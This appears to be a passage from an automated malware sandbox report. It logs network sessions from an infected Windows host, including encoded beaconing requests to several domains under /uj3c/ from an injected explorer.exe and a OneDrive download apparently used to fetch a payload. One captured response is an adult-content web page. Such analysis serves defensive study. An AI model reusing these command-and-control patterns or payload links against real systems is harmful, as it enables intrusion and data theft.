6c 54 5a 64 75 6d 67 70 55 77 5a 6e 5a 6d 61 4c 68 36 44 66 4b 55 57 6a 54 64 71 43 58 59 48 6b 7e 76 4a 4f 56 74 74 4d 66 50 44 6d 4f 6e 6c 58 61 46 4d 51 58 78 51 54 78 63 6e 37 54 36 32 4d 51 35 61 61 77 34 65 77 6e 52 6b 39 6c 72 63 73 6c 57 51 65 79 39 37 33 4d 79 6b 78 28 6c 76 64 73 68 74 47 76 70 49 38 63 41 4d 35 56 74 76 71 76 64 47 61 4a 68 6a 79 32 43 31 52 45 52 6e 51 45 77 66 77 4a 51 73 39 68 58 28 6e 56 59 50 58 43 6f 70
                                                                                                                                        Data Ascii: r4S0P=vFqnDMjuN6~zqkFvp0QViTkfvoxLDWAJxBNiLL(fUlHhPePosuhwwm0eOdTOa-M_kZxAwgTIger-w0RQwDhboKQSwMsmRwPWaRfjGXuCzYvCDmZYh-vbtgwZRDk2V-j-3speqFpoD9bHxwezgE2E7yvzTxXBtmj3DlXl4ilMF5iEtzDiaQeELpgkBPz-3qe6ezrzLQ(QzNVSvSt_~aD32SbE3Yul3pCpvntQfMXPXcnJiKsBQzKECFq_4Ld9uMmry2Zci44TpjnmFF7YBX8QD-3T9Ao6i31D(girxj9CMgDQhjcl38ZtIyNskzji56HvN_UaiDZ1MtetAYI-4t(hO0SxICQlsZtiUXFQcxCmQlVRi-g6hQgjEAHDtJ4sL06uzVINw1~2b8d3ZZugDNrjj36kY79xaA9_ii(zX0gqRBWW(hUh1H9UUsAZHqrRaco2zFRJp7QyJCXUScZE5JhfbexgFRZ2Czxss9q_hqvPrc1wDCSU7mGHWyxkxBzsVcRe6qeoTb~dp9cHXAH2(I~M1FzHitHXIo6oQeT8kGyebkNcctpVlLeEotSx9Uhl302wu0l4n7cmYgBQr6sMzw7Jkg2YBCzzghZPGjuUmBj5Rm0Br3QMUanKqTvYvUdIsMEtVCe-kBXTeDKdDftbxcdfh6EhTmnQ4eqIckxM80QbwEOf8g4sSPOR9bQDx3a8szT0ispO1J0eZpCVX76INRi4F0wvgk60oHQZEbkPWXqm2bPPT2IAlSwaghv9OHmSykYzQiOtJgojs_mmWlLqlayS~GdvqRYxuOVyGuGRyi5lhowdhbe6AeWnVsfcwP5FnaMO0m(_l_RTcgnyM1GMUzwv8RP51LqQf5EGtbkqHOckQKDewZgDxsM_DqrAI-JOeoIcn7WFaIgvBYQFhU4AhH~Deh~XIQkCh_4Yt6N9YMxha46cmF6nevyQJi7Ns-atLRTzB_BDW8sboqRYONudNbLpsG4AIK5hOXWEQwefNeX_YpGfnjpj5sXUZ-FyQn7BhOWDmS6MuXhRXlXRbSfLeAAJDnIHRxi_x3EyXUg-XnhmJ2CimCoW5QVMDMWeLpWlX4tVTMY8fhe5So(BGXiU81qdZTnCwHedo-0oxXA-JzmsQGYNVxHXQumBxXUtfVED0z31lutYbNfxukwg8sBA~Jd23QgYgGvSd96oRWoigUBwGRy00q6-R3dnC8AlJHlTZdumgpUwZnZmaLh6DfKUWjTdqCXYHk~vJOVttMfPDmOnlXaFMQXxQTxcn7T62MQ5aaw4ewnRk9lrcslWQey973Mykx(lvdshtGvpI8cAM5VtvqvdGaJhjy2C1RERnQEwfwJQs9hX(nVYPXCop3LQKd1cTRfXQuynLtPySyK42nZuPDqo3foQZ9W6EyQtORDonzVbj7aJaShK9Syq0yloJRdWA3slB6xIFxoDuJbnH9VUCjx9jTWrfHkRzKV_PIWCxGRh3imxQS4Y2Rjz6sc22VCgki9JVSEF~bq1Aypxvlw0h7(lHqrvW5eMjHbc(SfDy9JSm1japP35L4Tqv01S9e5w9_XcFwBPsY3JMcKB2VsvdNZVY33Tgx(vi2wuKcSqNVi0fi(Q3UGhymrWEsA2nhJGSCZDzYgcjraEzhw09pWUPYMnVNGNmb68TsL1BFmyjPXSjFLN(Pd9Z8blZmYezKn9BG~RUEDaAiiU5Hv5qI(VhVZZYl(rhwttSE8b(Wx6vpeoVqwcdgDKJ7fYLPYKW3HZsM1QF0mIHS867GwJiQZAXcAndm6JGYWNBjh8X9ZvgIM6RROwuy0anRm2mRyIQYvit2pFnwUHgkpSCqsXenvOI9EXEtpaUt5oGvvHuIi0qgTj8Xl1C4(A9Klovv3sGYwDu_Vt1ho_Ww3B(MKYCgDYlF(Ilio1ZhoGHjzKHHjr7aQ_b8AvJnhPhbur2bWUPiy9IYXtxYpnEnQtFVUjK1jzOoO5SlGeMrs5P81ZPjd0kT0C5_YRe7kvkGFKw6V2U2GUAqdGzFh8yq1qLiAT5fDOXjwZAQb4XHMwuRoOp4UxDZe8M8A37StE1g9ZfAD4ZwtO4IpYIAz15J4P8YDp07R2edlmPZe2SB0h90rmZvbzJt8Wj7po(Ktng9VBBhaLfq4itHyDW3jyokuKRpbpoM7OY9PaYeBbUkvg60L35zltInehf0cBSFrSgfU1yCqo8DGel9pWeekZfbx7wQ71h5rjrouF7yy0qrlTuvOKBd03acoMOyUG9lSA5MWA~rz5C9v02mHlUKVDWvhbJXK-vPi3b9qUMohBkx(ROjazoGnCyvNSzJvGeZU1AwxgWfuRnrfgtJYCYO(JWOTcoOOiJEs0BomKFX3v4CC9dRw1nrk_FR4T~z(PxknSArkqDY3qUWYhxLgiabKCkcFU7xYDZWaadxgky2zdS9KsJFRF1uXxdH4mIKkAHrZ8O_KWS2cT0zQe9iljn_8ZhjhH~zZkBmKQp0lnh_pds_jYKFvEuH5D49wupyqe6uNgfap8y32ZC1ach57n2nEcZ9USq5142wjNl-eXYk8VFw24ysGcvkYTF06C3CT2pJ9SEWLDazMZrwbsc85WQzXu0jyaSOW6j09yQes69l6JVr1JCGgz634rRaN12SFvlb48BLYT7hxtd4axf0(Et34FdmCxuI~btlU9FT~mtuPkIQlAHjQUtcFDVdKWJD1YXScU7LhCcOkGPeHb3gG8P08w5zvx9Zrw0xBnla8uspz8UdQgDSoGHk~pvWc0dsFMzfzcxYvygAVISzzEYFEX5oHyFsU85PekVtu6J0nuqM8PFeXsnVPXd4IThhVAm7V9X2o4CE02zgNKErEz8RldnVvHSzoj~h7VOX58mZxg8uSDtX1WDcqyaol7zoQDOwgLcPhbnHWgN7lOvoNm9a5AiR6ZQuO4BQFli0Xj3Aj3LSIrf0IVgzy2HriIjKhFUmFUUmp48cICjhkHDRCBAhc3As6WCDt0~klIuN9HGu9YIbZqmnURHaViR-gNSPzfhUnTbzO7Xgn_IwpMtGiNuQlqFnwq7BfNiefmVYEpn8nCs14vU4TKXgqcyn3WDxkl4vJDBcpiWZ0YC16-KD52yQGBmwPygrxytAI0VKfpZs8E(9o63map6lD83XttLN6zJhEynC~S8YD5bWVoHYr4i0iQLvf95weLAgMqS4xOY6LHwJ1ESy5npmDvXNAFw_3N15zkXOk1IZDCXPjkjElxrt~ohYyY(c1iwFcIF8MR0EQFzzo0TdcBqJmqU7VvTF2Clght6CpRwJ5UDkUb~eNOgblcZEeS9swRVHlqHONfbuAq(vy7At39Ct(xmOILgcKMAEjRs5~udTbHUuV3C7mjquiCbB~2bxiaweqSKODLGNlyuDip0K(Y3mMLaQaRVTcrQar-ht6nfBCb1DFFOKcjmlGFukNXMJD7Q2o_wvIASPImsAOakO5sPFmD4RAdayeX2XoYQ3Xw4rmqpZj3cBPqzqWgsWQyYew6~Fy7QbI3luybtFdrIImFRWTWoiKIilu8nMDZ1X(eMlCMUQYjKQuu(zrtKWw81nX6q55u~pbm(clDUdZ4J1ahNjhGZfo6Q80J42eMrLIhM_6zK3U81xzThInbYwSSE1ZZWR5wEYPcfU2icBOrrtMWUYP7XmJ6elrtSddR5CLJauLogjpW2lG6UA8I~A1rgeVTk6nl3KDHgPFaz3mfm_fqK4xNxA~83caeE-J6IQCBRgJ3XhJjVo0DTa(kS9Ry08GMQDoSU3wPzV5uzJhR4yXhkFmUpP~8hgz6(cC3GTa1~PpAPf9CY5oZWDQcEbYHQzkjaFbzyOgYgoQb434ktcNbi1uLRuhNqIl1h_OqeXs6vt~d3dVWOVLv(CZgor60CUd2Jcz9h6mjbmdcETMYeCDJuqN9tTaohFm7HbBuMHGc07Z1a_ao6Y8ygftiGUzR3eJYoNXGl9hVEx8G2U7rX7j19zwLrXLDWLR226~GV-6LPG9CQPWUFq8Evo35105w4G~r11DYGubtnv50BGTs8K59B7uVTAMxNN6RWy0rEWTdyCyDD_~0~AWIKEKH2BGZHAD2eujp18lxXVd68Z7F
                                                                                                                                        Aug 8, 2022 20:15:40.535001993 CEST10173OUTData Raw: 31 6a 37 6b 30 74 48 4c 28 44 54 53 79 37 7a 55 78 4e 4f 67 6f 5f 36 43 6b 78 57 56 63 41 4a 43 64 2d 49 62 34 58 78 4c 4f 70 6c 4e 47 4f 37 6e 28 4d 38 43 55 65 5a 38 32 75 45 64 58 54 61 68 47 6d 65 32 67 4b 33 73 66 55 36 69 70 65 44 5f 39 36
                                                                                                                                        Data Ascii: 1j7k0tHL(DTSy7zUxNOgo_6CkxWVcAJCd-Ib4XxLOplNGO7n(M8CUeZ82uEdXTahGme2gK3sfU6ipeD_96Cxhvhz6Z6507O-IRITM8g1GsLleB(3nag1VBRGREvqj_TAFanJdJXkjZGz(RR4tvgPwNJM8pXjDvrWrxdJBdGuBwsnHKvhVrJ7C1u5N6Ndh3(I90MYdA(OFXYlFWntKzkjH85AzCcI~alFYDQsrOvuHFSwyH~5q8f
                                                                                                                                        Aug 8, 2022 20:15:40.535063982 CEST10176OUTData Raw: 54 44 78 57 63 65 77 44 76 35 58 59 77 70 52 47 5a 79 47 6b 5a 53 66 70 7e 30 4e 30 72 57 54 64 66 5f 4b 54 41 48 50 69 6c 4f 41 65 44 56 4f 74 61 48 30 56 58 36 4a 69 4a 67 6d 2d 56 59 46 79 4b 49 59 75 57 67 49 46 38 52 72 77 66 33 61 47 63 4f
                                                                                                                                        Data Ascii: TDxWcewDv5XYwpRGZyGkZSfp~0N0rWTdf_KTAHPilOAeDVOtaH0VX6JiJgm-VYFyKIYuWgIF8Rrwf3aGcODX1JactQ9_aqRDZrhIwOjtOnPiOr6D~q(3~ogSYZgWL1eFYDK8U5zFYJyVT_3wCdlHL0pE5Hk4hyyC~Uk7oxDRBVXBhlNjXRDyxUma9hk_CyAWDf0Tn1osjozA09pOb08Yi7FcJ7u_Y8rti_hqsytsXDWEv1~dzTz
                                                                                                                                        Aug 8, 2022 20:15:40.729209900 CEST10184OUTData Raw: 39 6a 57 5a 51 7a 46 43 70 35 37 77 63 63 48 36 61 4c 54 7a 6b 61 7e 74 42 4a 7a 55 33 50 54 71 7e 53 69 6d 55 76 56 35 44 4d 52 54 42 42 7e 79 50 37 58 49 63 79 59 55 35 71 53 2d 58 65 47 6e 53 44 45 6b 67 42 30 69 4d 54 42 6b 4c 53 4b 36 6d 77
                                                                                                                                        Data Ascii: 9jWZQzFCp57wccH6aLTzka~tBJzU3PTq~SimUvV5DMRTBB~yP7XIcyYU5qS-XeGnSDEkgB0iMTBkLSK6mwI3utwowzg1ubJou7c6Rh94CWNNZUBRivJgiwwKDGuN7QZtDeXArP2QgLYayud2Vh37Py5xGV~Nru(sMtF2c4rbSKAABmc6ICfjaEvJ~MdoNeKyMr(YCy~Sk7sLX-Y2Wr1oXF3JHUH-saF-W6tI68b-VsOdEfjTvYL


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        19192.168.2.34986138.54.163.5780C:\Windows\explorer.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Aug 8, 2022 20:15:40.535789013 CEST10176OUTGET /uj3c/?r4S0P=gHeddp3rEbyt6G4S2ENO5jUfv41eCHMoiHYIOJLTbAbXI9CsqM4W4jpYcdbraNUyjMQx&aN68=XPUturKxIt HTTP/1.1
                                                                                                                                        Host: www.nomaxdic.com
                                                                                                                                        Connection: close
                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                        Data Ascii:
                                                                                                                                        Aug 8, 2022 20:15:40.744405031 CEST10185INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Mon, 08 Aug 2022 18:15:31 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 1776
                                                                                                                                        Connection: close
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 bb c6 c9 bd cf da bc cd bb f5 d4 cb b4 fa c0 ed d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 31 31 36 3b 26 23 32 36 33 37 36 3b 26 23 31 39 39 36 39 3b 26 23 33 39 33 32 31 3b 26 23 32 31 35 31 32 3b 26 23 33 32 35 36 34 3b 26 23 32 34 37 37 33 3b 26 23 33 32 35 39 33 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 34 30 36 34 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 32 39 32 35 35 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 33 32 35 39 33 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 35 31 30 35 3b 26 23 32 31 36 34 34 3b 26 23 32 30 31 34 36 3b 26 23 32 32 39 37 30 3b 26 23 32 32 33 31 32 3b 26 23 32 33 34 35 38 3b 26 23 32 31 33 38 31 3b 26 23 32 30 33 31 36 3b 26 23 32 39 32 33 33 3b 26 23 37 32 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 31 31 36 3b 26 23 32 36 33 37 36 3b 26 23 31 39 39 36 39 3b 26 23 33 39 33 32 31 3b 26 23 32 31 35 31 32 3b 26 23 33 32 35 36 34 3b 26 23 32 34 37 37 33 3b 26 23 33 32 35 39 33 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 34 30 36 34 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 32 39 32 35 35 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 33 32 35 39 33 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 35 31 30 35 3b 26 23 32 31 36 34 34 3b 26 23 32 30 31 34 36 3b 26 23 32 32 39 37 30 3b 26 23 32 32 33 31 32 3b 26 23 32 33 34 35 38 3b 26 23 32 31 33 38 31 3b 26 23 32 30 33 31 36 3b 26 23 32 39 32 33 33 3b 26 23 37 32 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 31 31 36 3b 26 23 32 36 33 37 36 3b 26 23 31 39 39 36 39 3b 26 23 33 39 33 32 31 3b 26 23 32 31 35 31 32 3b 26 23 33 32 35 36 34 3b 26 23 32 34 37 37 33 3b 26 23 33 32 35 39 33 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 34 30 36 34 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 32 39 32 35 35 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 33 32 35 39 33 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 35 31 30 35 3b 26 23 32 31 36 34 34 3b 26 23 32 30 31 34 36 3b 26 23 32 32 39 37 30 3b 26 23 32 32 33 31 32 3b 26 23 32 33 34 35 38 3b 26 23 32 31 33 38 31 3b 26
                                                                                                                                        Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#20037;&#20037;&#20116;&#26376;&#19969;&#39321;&#21512;&#32564;&#24773;&#32593;,&#22269;&#20135;&#20813;&#36153;&#35266;&#30475;&#20037;&#20037;&#40644;&#65;&#86;&#29255;,&#20122;&#27954;&#65;&#86;&#32593;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#25105;&#21644;&#20146;&#22970;&#22312;&#23458;&#21381;&#20316;&#29233;&#72;</title><meta name="keywords" content="&#20037;&#20037;&#20116;&#26376;&#19969;&#39321;&#21512;&#32564;&#24773;&#32593;,&#22269;&#20135;&#20813;&#36153;&#35266;&#30475;&#20037;&#20037;&#40644;&#65;&#86;&#29255;,&#20122;&#27954;&#65;&#86;&#32593;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#25105;&#21644;&#20146;&#22970;&#22312;&#23458;&#21381;&#20316;&#29233;&#72;" /><meta name="description" content="&#20037;&#20037;&#20116;&#26376;&#19969;&#39321;&#21512;&#32564;&#24773;&#32593;,&#22269;&#20135;&#20813;&#36153;&#35266;&#30475;&#20037;&#20037;&#40644;&#65;&#86;&#29255;,&#20122;&#27954;&#65;&#86;&#32593;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#25105;&#21644;&#20146;&#22970;&#22312;&#23458;&#21381;&
                                                                                                                                        Aug 8, 2022 20:15:40.744460106 CEST10186INData Raw: 23 32 30 33 31 36 3b 26 23 32 39 32 33 33 3b 26 23 37 32 3b 2c 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 32 31 34 34 38 3b 26 23 34 30 36 34 34 3b 26 23 32 31 34 34 38 3b 26 23 32 31 30 35 30 3b 26 23 32 38 36
                                                                                                                                        Data Ascii: #20316;&#29233;&#72;,&#26080;&#36974;&#25377;&#21448;&#40644;&#21448;&#21050;&#28608;&#21448;&#29245;&#30340;&#35270;&#39057;,&#33394;&#27442;&#20037;&#20037;&#20037;&#22825;&#22825;&#22825;&#32508;&#21512;&#32593;&#31934;&#21697;,&#20037;&#20


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        2192.168.2.34974613.107.43.12443C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        3192.168.2.34974813.107.43.12443C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        4192.168.2.34974913.107.43.13443C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        5192.168.2.34975113.107.43.13443C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        6192.168.2.349822209.17.116.16380C:\Windows\explorer.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Aug 8, 2022 20:14:13.788683891 CEST10015OUTGET /uj3c/?aN68=XPUturKxIt&r4S0P=YWpgW+COIZOeD7RBAds2ahhkbsB0iwv6LNJvq1IjxaRtw/JoYlxZSXI6K9FgH36jX673 HTTP/1.1
                                                                                                                                        Host: www.meigsbuilds.online
                                                                                                                                        Connection: close
                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                        Data Ascii:
                                                                                                                                        Aug 8, 2022 20:14:13.910449028 CEST10015INHTTP/1.1 400 Bad Request
                                                                                                                                        Server: openresty/1.19.9.1
                                                                                                                                        Date: Mon, 08 Aug 2022 18:14:13 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 163
                                                                                                                                        Connection: close
                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 39 2e 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.19.9.1</center></body></html>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        7192.168.2.34982381.169.145.15880C:\Windows\explorer.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Aug 8, 2022 20:14:18.982198954 CEST10016OUTGET /uj3c/?r4S0P=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&aN68=XPUturKxIt HTTP/1.1
                                                                                                                                        Host: www.naturathome.info
                                                                                                                                        Connection: close
                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                        Data Ascii:
                                                                                                                                        Aug 8, 2022 20:14:19.002310991 CEST10017INHTTP/1.1 301 Moved Permanently
                                                                                                                                        Date: Mon, 08 Aug 2022 18:14:18 GMT
                                                                                                                                        Server: Apache/2.4.54 (Unix)
                                                                                                                                        Location: https://natur4home.de/uj3c/?r4S0P=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&aN68=XPUturKxIt
                                                                                                                                        Content-Length: 330
                                                                                                                                        Connection: close
                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 61 74 75 72 34 68 6f 6d 65 2e 64 65 2f 75 6a 33 63 2f 3f 72 34 53 30 50 3d 44 5a 2b 7a 31 4a 57 57 46 4b 30 41 30 74 56 52 58 6c 61 70 67 6e 2f 36 61 31 66 6f 37 35 34 70 36 73 30 76 52 69 67 66 6d 6c 32 65 65 7a 39 5a 61 62 79 73 39 49 65 53 44 66 4f 47 4c 65 4d 37 69 48 73 6a 26 61 6d 70 3b 61 4e 36 38 3d 58 50 55 74 75 72 4b 78 49 74 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://natur4home.de/uj3c/?r4S0P=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&amp;aN68=XPUturKxIt">here</a>.</p></body></html>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        8192.168.2.34983934.102.136.18080C:\Windows\explorer.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Aug 8, 2022 20:14:24.056804895 CEST10053OUTGET /uj3c/?aN68=XPUturKxIt&r4S0P=aJ6ZN5DW6YxDAHX5hoqiKthR1Q3Gyr9jYIHooZSiQRwJPZTqb166CSRFwQJEcQMMTPqy HTTP/1.1
                                                                                                                                        Host: www.nutricognition.com
                                                                                                                                        Connection: close
                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                        Data Ascii:
                                                                                                                                        Aug 8, 2022 20:14:24.174422979 CEST10054INHTTP/1.1 403 Forbidden
                                                                                                                                        Server: openresty
                                                                                                                                        Date: Mon, 08 Aug 2022 18:14:24 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 291
                                                                                                                                        ETag: "62f13bce-123"
                                                                                                                                        Via: 1.1 google
                                                                                                                                        Connection: close
                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        9192.168.2.349849198.54.117.21880C:\Windows\explorer.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Aug 8, 2022 20:14:29.416650057 CEST10083OUTGET /uj3c/?r4S0P=aL7cM5bWXy4HE7vWB0nbwz9R2nEE3UQV4bcsZzkldkiOPNKheX3xai9N2uMecq2n4iLl&aN68=XPUturKxIt HTTP/1.1
                                                                                                                                        Host: www.designgamagazine.com
                                                                                                                                        Connection: close
                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                        Data Ascii:


                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        0192.168.2.34972813.107.43.13443C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        2022-08-08 18:12:07 UTC0OUTGET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1
                                                                                                                                        User-Agent: lVali
                                                                                                                                        Host: onedrive.live.com
                                                                                                                                        2022-08-08 18:12:07 UTC0INHTTP/1.1 302 Found
                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Expires: -1
